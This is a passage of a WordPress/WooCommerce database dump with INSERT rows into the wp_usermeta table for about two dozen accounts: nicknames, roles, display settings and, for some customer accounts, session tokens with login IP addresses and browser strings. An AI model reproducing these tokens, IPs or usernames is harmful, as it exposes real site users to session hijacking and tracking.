INSERT INTO `wp_usermeta` VALUES (11843, 745, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11844, 745, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11845, 745, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11846, 745, '_yoast_wpseo_profile_updated', '1492719039'); 
INSERT INTO `wp_usermeta` VALUES (11847, 745, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11848, 746, 'nickname', 'kamran.rafiq1964'); 
INSERT INTO `wp_usermeta` VALUES (11849, 746, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11850, 746, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11851, 746, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11852, 746, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11853, 746, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11854, 746, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11855, 746, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11856, 746, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11857, 746, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11858, 746, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11859, 746, '_yoast_wpseo_profile_updated', '1492719107'); 
INSERT INTO `wp_usermeta` VALUES (11860, 746, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11861, 747, 'nickname', 'dnlmonkey1997'); 
INSERT INTO `wp_usermeta` VALUES (11862, 747, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11863, 747, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11864, 747, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11865, 747, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11866, 747, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11867, 747, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11868, 747, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11869, 747, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11870, 747, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11871, 747, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11872, 747, '_yoast_wpseo_profile_updated', '1492719860'); 
INSERT INTO `wp_usermeta` VALUES (11873, 747, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11874, 748, 'nickname', 'atrammel331977'); 
INSERT INTO `wp_usermeta` VALUES (11875, 748, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11876, 748, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11877, 748, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11878, 748, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11879, 748, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11880, 748, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11881, 748, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11882, 748, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11883, 748, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11884, 748, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11885, 748, '_yoast_wpseo_profile_updated', '1492719982'); 
INSERT INTO `wp_usermeta` VALUES (11886, 748, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11887, 749, 'nickname', 'erik.ipsen'); 
INSERT INTO `wp_usermeta` VALUES (11888, 749, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11889, 749, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11890, 749, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11891, 749, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11892, 749, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11893, 749, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11894, 749, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11895, 749, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11896, 749, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11897, 749, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11898, 749, '_yoast_wpseo_profile_updated', '1492720017'); 
INSERT INTO `wp_usermeta` VALUES (11899, 749, 'session_tokens', 'a:1:{s:64:"89f03016ce73d689c71dedd4b6a3803ee5f59b823d46addde25c08d0987e6060";a:4:{s:10:"expiration";i:1493929626;s:2:"ip";s:14:"98.179.146.194";s:2:"ua";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492720026;}}'); 
INSERT INTO `wp_usermeta` VALUES (11900, 750, 'nickname', 'cyclebliss131990'); 
INSERT INTO `wp_usermeta` VALUES (11901, 750, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11902, 750, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11903, 750, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11904, 750, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11905, 750, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11906, 750, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11907, 750, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11908, 750, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11909, 750, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11910, 750, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11911, 750, '_yoast_wpseo_profile_updated', '1492720131'); 
INSERT INTO `wp_usermeta` VALUES (11912, 750, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11913, 751, 'nickname', 'samanthag152004'); 
INSERT INTO `wp_usermeta` VALUES (11914, 751, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11915, 751, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11916, 751, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11917, 751, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11918, 751, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11919, 751, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11920, 751, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11921, 751, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11922, 751, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11923, 751, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11924, 751, '_yoast_wpseo_profile_updated', '1492721710'); 
INSERT INTO `wp_usermeta` VALUES (11925, 751, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11926, 752, 'nickname', 'amazon1978'); 
INSERT INTO `wp_usermeta` VALUES (11927, 752, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11928, 752, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11929, 752, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11930, 752, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11931, 752, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11932, 752, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11933, 752, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11934, 752, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11935, 752, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11936, 752, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11937, 752, '_yoast_wpseo_profile_updated', '1492722192'); 
INSERT INTO `wp_usermeta` VALUES (11938, 752, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11939, 753, 'nickname', 'katia.serrato'); 
INSERT INTO `wp_usermeta` VALUES (11940, 753, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11941, 753, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11942, 753, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11943, 753, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11944, 753, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11945, 753, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11946, 753, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11947, 753, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11948, 753, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11949, 753, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11950, 753, '_yoast_wpseo_profile_updated', '1492722297'); 
INSERT INTO `wp_usermeta` VALUES (11951, 753, 'session_tokens', 'a:1:{s:64:"f27e2547558adcc590dafeef49e0cc37c2f5764d4aa462e631f28e7771aec42a";a:4:{s:10:"expiration";i:1493931907;s:2:"ip";s:14:"208.87.239.201";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1492722307;}}'); 
INSERT INTO `wp_usermeta` VALUES (11952, 754, 'nickname', 'jfitz90931974'); 
INSERT INTO `wp_usermeta` VALUES (11953, 754, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11954, 754, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11955, 754, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11956, 754, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11957, 754, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11958, 754, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11959, 754, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11960, 754, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11961, 754, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11962, 754, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11963, 754, '_yoast_wpseo_profile_updated', '1492723223'); 
INSERT INTO `wp_usermeta` VALUES (11964, 754, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11965, 753, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (11966, 755, 'nickname', 'bryanduke1231990'); 
INSERT INTO `wp_usermeta` VALUES (11967, 755, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11968, 755, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11969, 755, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11970, 755, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11971, 755, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11972, 755, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11973, 755, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11974, 755, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11975, 755, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11976, 755, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11977, 755, '_yoast_wpseo_profile_updated', '1492724876'); 
INSERT INTO `wp_usermeta` VALUES (11978, 755, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11979, 756, 'nickname', 'lickylumley2002'); 
INSERT INTO `wp_usermeta` VALUES (11980, 756, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11981, 756, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11982, 756, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11983, 756, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11984, 756, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11985, 756, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11986, 756, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (11987, 756, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11988, 756, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11989, 756, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (11990, 756, '_yoast_wpseo_profile_updated', '1492725349'); 
INSERT INTO `wp_usermeta` VALUES (11991, 756, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (11992, 757, 'nickname', 'metenos1971'); 
INSERT INTO `wp_usermeta` VALUES (11993, 757, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11994, 757, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (11995, 757, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (11996, 757, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (11997, 757, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (11998, 757, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (11999, 757, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12000, 757, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12001, 757, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12002, 757, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12003, 757, '_yoast_wpseo_profile_updated', '1492725683'); 
INSERT INTO `wp_usermeta` VALUES (12004, 757, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12005, 758, 'nickname', 'cneedel1989'); 
INSERT INTO `wp_usermeta` VALUES (12006, 758, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12007, 758, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12008, 758, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12009, 758, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12010, 758, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12011, 758, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12012, 758, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12013, 758, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12014, 758, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12015, 758, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12016, 758, '_yoast_wpseo_profile_updated', '1492726146'); 
INSERT INTO `wp_usermeta` VALUES (12017, 758, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12018, 759, 'nickname', 'glendaewart1950'); 
INSERT INTO `wp_usermeta` VALUES (12019, 759, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12020, 759, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12021, 759, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12022, 759, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12023, 759, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12024, 759, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12025, 759, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12026, 759, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12027, 759, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12028, 759, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12029, 759, '_yoast_wpseo_profile_updated', '1492726596'); 
INSERT INTO `wp_usermeta` VALUES (12030, 759, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12031, 760, 'nickname', '9809.b.b.m1964'); 
INSERT INTO `wp_usermeta` VALUES (12032, 760, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12033, 760, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12034, 760, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12035, 760, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12036, 760, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12037, 760, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12038, 760, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12039, 760, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12040, 760, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12041, 760, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12042, 760, '_yoast_wpseo_profile_updated', '1492727658'); 
INSERT INTO `wp_usermeta` VALUES (12043, 760, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12044, 761, 'nickname', 'retroloco1989'); 
INSERT INTO `wp_usermeta` VALUES (12045, 761, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12046, 761, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12047, 761, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12048, 761, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12049, 761, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12050, 761, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12051, 761, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12052, 761, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12053, 761, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12054, 761, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12055, 761, '_yoast_wpseo_profile_updated', '1492728734'); 
INSERT INTO `wp_usermeta` VALUES (12056, 761, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12057, 762, 'nickname', 'rgrmojer177'); 
INSERT INTO `wp_usermeta` VALUES (12058, 762, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12059, 762, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12060, 762, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12061, 762, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12062, 762, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12063, 762, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12064, 762, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12065, 762, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12066, 762, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12067, 762, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12068, 762, '_yoast_wpseo_profile_updated', '1492737657'); 
INSERT INTO `wp_usermeta` VALUES (12069, 762, 'session_tokens', 'a:1:{s:64:"c7c8ad1bb67041ec5786ba8d2fa0acd440b3dcf165f471dc9005432ddf04dd66";a:4:{s:10:"expiration";i:1493947266;s:2:"ip";s:14:"100.33.154.188";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1492737666;}}'); 
INSERT INTO `wp_usermeta` VALUES (12070, 763, 'nickname', 'nikkibarnes120002005'); 
INSERT INTO `wp_usermeta` VALUES (12071, 763, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12072, 763, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12073, 763, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12074, 763, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12075, 763, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12076, 763, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12077, 763, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12078, 763, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12079, 763, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12080, 763, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12081, 763, '_yoast_wpseo_profile_updated', '1492742289'); 
INSERT INTO `wp_usermeta` VALUES (12082, 763, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12083, 764, 'nickname', 'pudgie1978261976'); 
INSERT INTO `wp_usermeta` VALUES (12084, 764, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12085, 764, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12086, 764, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12087, 764, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12088, 764, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12089, 764, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12090, 764, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12091, 764, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12092, 764, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12093, 764, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12094, 764, '_yoast_wpseo_profile_updated', '1492746650'); 
INSERT INTO `wp_usermeta` VALUES (12095, 764, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12096, 765, 'nickname', 'contato1990'); 
INSERT INTO `wp_usermeta` VALUES (12097, 765, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12098, 765, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12099, 765, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12100, 765, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12101, 765, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12102, 765, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12103, 765, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12104, 765, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12105, 765, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12106, 765, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12107, 765, '_yoast_wpseo_profile_updated', '1492748784'); 
INSERT INTO `wp_usermeta` VALUES (12108, 765, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12109, 766, 'nickname', 'ftrigg1957'); 
INSERT INTO `wp_usermeta` VALUES (12110, 766, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12111, 766, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12112, 766, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12113, 766, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12114, 766, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12115, 766, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12116, 766, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12117, 766, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12118, 766, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12119, 766, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12120, 766, '_yoast_wpseo_profile_updated', '1492749756'); 
INSERT INTO `wp_usermeta` VALUES (12121, 766, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12122, 767, 'nickname', '540pto1968'); 
INSERT INTO `wp_usermeta` VALUES (12123, 767, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12124, 767, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12125, 767, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12126, 767, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12127, 767, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12128, 767, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12129, 767, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12130, 767, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12131, 767, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12132, 767, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12133, 767, '_yoast_wpseo_profile_updated', '1492751057'); 
INSERT INTO `wp_usermeta` VALUES (12134, 767, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12135, 768, 'nickname', 'naleenie1591991'); 
INSERT INTO `wp_usermeta` VALUES (12136, 768, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12137, 768, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12138, 768, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12139, 768, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12140, 768, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12141, 768, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12142, 768, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12143, 768, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12144, 768, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12145, 768, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12146, 768, '_yoast_wpseo_profile_updated', '1492752073'); 
INSERT INTO `wp_usermeta` VALUES (12147, 768, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12148, 769, 'nickname', 'stevevetter1955'); 
INSERT INTO `wp_usermeta` VALUES (12149, 769, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12150, 769, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12151, 769, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12152, 769, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12153, 769, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12154, 769, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (12155, 769, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (12156, 769, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12157, 769, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (12158, 769, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (12159, 769, '_yoast_wpseo_profile_updated', '1492761636'); 
INSERT INTO `wp_usermeta` VALUES (12160, 769, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (12161, 770, 'nickname', 'probuilderads1966'); 
INSERT INTO `wp_usermeta` VALUES (12162, 770, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12163, 770, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (12164, 770, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (12165, 770, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (12166, 770, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (12167, 770, 'admin_color', 'fresh'); 
